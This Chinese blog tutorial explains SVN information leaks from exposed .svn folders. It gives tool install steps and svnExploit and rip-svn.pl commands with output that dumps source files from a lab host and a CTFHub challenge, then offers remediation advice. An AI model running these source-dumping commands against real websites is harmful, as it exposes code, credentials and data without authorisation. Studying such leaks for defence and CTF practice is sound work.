73、SVN信息泄露漏洞检测利用

已于 2023-11-10 18:11:33 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: # 渗透基础 文章标签: Web渗透测试
于 2023-10-20 16:56:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fly_hps/article/details/133949973
版权
漏洞介绍

SVN是一个开放源代码的版本控制系统,在使用SVN管理本地代码过程中会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息,网站管理员在发布代码时如果没有使用导出功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,可以利用.svn/entries文件获取到服务器源码

利用工具

Seay-SVN漏洞利用工具

利用工具

https://github.com/kost/dvcs-ripper

安装第三方依赖:

sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl

sudo apt-get install cvs subversion git bzr mercurial

利用脚本

svnExploit.py

https://github.com/admintony/svnExploit

漏洞检测:

python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/
 ____             _____            _       _ _
/ ___|_   ___ __ | ____|_  ___ __ | | ___ (_) |_
\___ \ \ / / '_ \|  _| \ \/ / '_ \| |/ _ \| | __|
 ___) \ V /| | | | |___ >  <| |_) | | (_) | | |_
|____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
                            |_|
SvnExploit - Dump the source code by svn
Author: AdminTony (http://admintony.com)
https://github.com/admintony/svnExploit


+--------------------+----------+------------------------------------------------+
|       文件名       | 文件类型 |                    CheckSum                    |
+--------------------+----------+------------------------------------------------+
|      conn.php      |   file   | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 |
|       trunk        |   dir    |                      None                      |
|      branches      |   dir    |                      None                      |
|  admin_login.php   |   file   | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 |
|     phpmyadmin     |   file   | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 |
|     README.TXT     |   file   | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 |
|     README.txt     |   file   | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 |
|     secret.php     |   file   | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 |
|     README.md      |   file   | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b |
| img/login_bg01.jpg |   file   | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd |
|        img         |   dir    |                      None                      |
|     index.php      |   file   | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 |
|      test.sql      |   file   | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 |
|     admin.php      |   file   | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f |
|      document      |   dir    |                      None                      |
|        tags        |   dir    |                      None                      |
+--------------------+----------+------------------------------------------------+

获取源码信息

python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/ --dump
 ____             _____            _       _ _
/ ___|_   ___ __ | ____|_  ___ __ | | ___ (_) |_
\___ \ \ / / '_ \|  _| \ \/ / '_ \| |/ _ \| | __|
 ___) \ V /| | | | |___ >  <| |_) | | (_) | | |_
|____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__|
                            |_|
SvnExploit - Dump the source code by svn
Author: AdminTony (http://admintony.com)
https://github.com/admintony/svnExploit


+--------------------+--------------------------------------------------------------------+----------+
|       文件名       |                                URL                                 | 下载状态 |
+--------------------+--------------------------------------------------------------------+----------+
|      conn.php      | .svn/pristine/8f/8f47ccbd4a436aa4f31018fea026275f6059ed10.svn-base | 下载成功 |
|     README.TXT     | .svn/pristine/c5/c5981462cc06422f4a78e68f0a48dddcf5860eb9.svn-base | 下载成功 |
|     README.txt     | .svn/pristine/ef/ef4b5f3081dbac31f9fb089aafd60dd2b9474b51.svn-base | 下载成功 |
|     phpmyadmin     | .svn/pristine/6d/6d5af41c175e344ee483732648edc9318b2a6014.svn-base | 下载成功 |
|     secret.php     | .svn/pristine/2e/2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609.svn-base | 下载成功 |
|     README.md      | .svn/pristine/46/466f5ab1e4adfd373a23f639e0dd8fcfdce7874b.svn-base | 下载成功 |
|  admin_login.php   | .svn/pristine/a6/a6981b1ca963c8a75e133e38780be7ff0cd60952.svn-base | 下载成功 |
|     index.php      | .svn/pristine/46/4660847a73ab0906d91841dde9576bd5054b2020.svn-base | 下载成功 |
|     admin.php      | .svn/pristine/f4/f444d3aad996577872ac7b95a2c05aa11e6b1f8f.svn-base | 下载成功 |
|      test.sql      | .svn/pristine/09/096a90da3e471a472874413b18cb2f5dd0567fd1.svn-base | 下载成功 |
| img/login_bg01.jpg | .svn/pristine/31/311efc58c4d7035a54fdb8e94d6ba901c56354fd.svn-base | 下载成功 |
+--------------------+--------------------------------------------------------------------+----------+
[+] 已经Dump完成!
简易案例

下面以CTFHUB的一个svn信息泄露题目为例进行演示说明:

Step 1:访问靶场地址可以看到如下提示信息




CTFHub 环境实例 | 提示信息

Step 2:使用目录扫描发现确实存在svn信息泄露

python3 dirsearch.py -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/ -e *

Step 3:使用dvcs-ripper工具中的 rip-svn.pl脚本进行 clone

./rip-svn.pl -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/.svn/

从wc.db中找到flag的文件的文件名, 尝试访问结果发现被删除了

cat wc.db | grep -a flag

转而查找.svn/pristine/ 中的文件,找到flag——ctfhub{fc8dfadda86879a9956cde97}

修复建议

删除web目录中所有.svn隐藏文件夹,开发人员在使用SVN时,严格使用导出功能,禁止直接复制代码

  • 审查代码:需要对代码进行定期审查以确保没有敏感信息泄露,可以使用SVN的搜索功能来查找敏感信息,例如:密码和凭据
  • 限制访问权限:限制SVN服务器的访问权限,确保只有授权用户可以访问SVN服务器,可以使用SVN访问控制功能来限制用户的访问权限
  • 加强安全措施:为了防止将来的泄露,需要加强安全措施。例如,限制对SVN服务器的访问权限,使用多因素身份验证,定期更改密码等
  • 定期备份数据:需要定期备份SVN服务器的数据,以防止数据丢失或损坏。备份数据应存储在安全的位置,并定期测试备份数据的恢复性
  • 加密敏感信息:SVN没有像Git一样的撤销提交功能,因此需要使用其他方式来保护敏感信息。可以使用加密算法对敏感信息进行加密以保护敏感信息不被直接读取

FLy_鹏程万里
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Seay-Svn源代码泄露漏洞利用工具1.0+2.0.zip
03-24
SVN是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点结构。”(可以利用.svn/entries文件,获取到服务器源码、svn服务器账号密码等信息)。 提示一下:国内杀毒软件可能会出现报毒现象,这是正常的情况,建议关闭杀毒软件。 不放心的可以在虚拟机里运行。
浅谈“SVN信息泄露
→_→
07-09 3183
一:漏洞名称: SVN信息泄露、版本管理工具文件信息泄漏 描述: SVN(subversion)是程序员常用的源代码版本管理软件。一旦网站出现SVN漏洞,其危害远比SQL注入等其它常见网站漏洞更为致命,因为黑客获取到网站源代码后,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁。更严重的问题在于,SVN产生的.svn目录下还包含了以.svn-base结尾的源代码文件副本(低版本SVN具体路径为text-base目录,高版本
记CTFhub中的svn泄露
最新发布
weixin_46954909的博客
02-18 372
使用的工具:1.SVNExploit(本题不推荐使用)如需要可私信我。
SVN信息泄露漏洞
weixin_47493074的博客
09-19 2183
SVN信息泄露漏洞
Seay-Svn源代码泄露漏洞扫描工具
07-08
SVN(subversion)是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点结构。”
SVN源码泄露利用原理+实战
王嘟嘟的博客
03-27 1万+
0x00 利用原理 关于svn的原理之前看过很多个,但是大多就是造成泄露的原因,无非就是人为粗心导致的。 关于svn利用分两个版本一个版本是svn>1.6,还有一个是svn<1.6 svn>1.6,文件名会被hash,然后再按照文件名对应hash的方式存到wc.db中,就是个sqlite数据库。最后我们按照名称遍历下载即可。 svn<1.6,文件会先去读取entries文件...
SVN源码泄露
noob_3000的博客
07-30 2995
svn泄露漏洞利用学习,dvcs-ripper在Windows环境下的搭建尝试(未成功)
记一次SVN信息泄露挖掘过程(附工具)
weixin_52040570的博客
04-10 2278
svn漏洞利用
svn信息泄露实战测试
逍遥小哥的博客
05-15 2127
1.下载工具 SvnExploit(其中有针对1.7版本以下和1.7版本以上 两个不同的使用命令)2.目录爆破或扫描器扫出svn信息泄露的路径。4.使用工具开始检测并下载网页源代码。3.访问查看svn版本。
SVN源码泄露漏洞
qq_60115503的博客
05-13 2430
SVN是什么 SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就用用于多个人共同开发同一个项目,实现的共享资源,实现最终集中式的管理
Web安全-SVN信息泄露漏洞分析
道阻且长,行则将至。
10-27 7681
文章目录漏洞简介漏洞复现漏洞检测脚本检测漏洞修复 漏洞简介 SVN(subversion)是程序员常用的源代码版本管理软件。在使用 SVN 管理本地代码过程中,使用 svn checkout 功能来更新代码时,项目目录下会自动生成隐藏的.svn文件夹(Linux上用 ls 命令看不到,要用 ls -al 命令),其中包含重要的源代码信息。 造成SVN源代码漏洞的主要原因是管理员操作不规范,一些网站管理员在发布代码时,不愿意使用“导出”功能,而是直接复制代码文件夹到WEB服务器上,这就使得.svn隐藏文件夹被
利用Seay-Svn源代码泄露漏洞下载网站源代码工具1.0+2.0版
06-16
SVN是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。 “在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹, 其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能, 而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境, 可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点结构。” (可以利用.svn/entries文件,获取到服务器源码、svn服务器账号密码等信息)。 很多网站都使用了svn版本控制系统,因此我们可以使用这个工具来下载网站源码。
svn漏洞利用工具
10-06
svn漏洞利用工具 .svn svn漏洞那shell svn信息查看器
Seay-Svn源代码泄露漏洞利用工具.rar
02-18
隐患描述:SVN(subversion)是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站...
SVN信息泄漏利用工具
11-22
SVN信息泄漏利用工具
3、基础篇————信息安全三要素
热门推荐
Fly_鹏程万里
02-26 3万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
11、信息收集篇————钟馗之眼使用
Fly_鹏程万里
02-28 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 ZoomEye是一款针对网络空间的搜索引擎,收录了互联网空间中的设备、网站及其使用的服务或组件等信息。 ZoomEye 拥有两大探测引擎:Xmap 和 Wmap,...
8、信息收集篇————Kali Linux自带工具
Fly_鹏程万里
04-12 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 Kali Linux是一个集成了许许多多的渗透测试工具的一款系统,也可以说是专门问渗透测试人员量身打造的一般,本小节就为大家来介绍一下kali当中有哪些用于信息收集...
36. 注入篇——伪静态注入
Fly_鹏程万里
03-08 8418
什么是伪静态“伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。如何辨明伪静态网站如果看到一个以.html或者.htm结尾的网页,此时可以通过呢在在地址输入框中输入:j...
删除svn信息
05-24
要删除 SVN 仓库中的信息,需要使用 SVN 命令行工具进行操作。以下是一些常见的删除操作: 1. 删除文件: ``` svn delete file.txt -m "Delete file.txt" ``` 2. 删除文件夹: ``` svn delete folder -m "Delete folder" ``` 3. 恢复已删除的文件或文件夹: ``` svn copy -r <revision> deleted_file.txt new_file.txt svn copy -r <revision> deleted_folder new_folder ``` 其中 `<revision>` 是被删除文件或文件夹最后一次提交的版本号。 4. 彻底删除文件或文件夹(包括历史记录): ``` svn delete --force file.txt svn delete --force folder ``` 请注意,彻底删除操作将无法恢复文件或文件夹,所以请谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值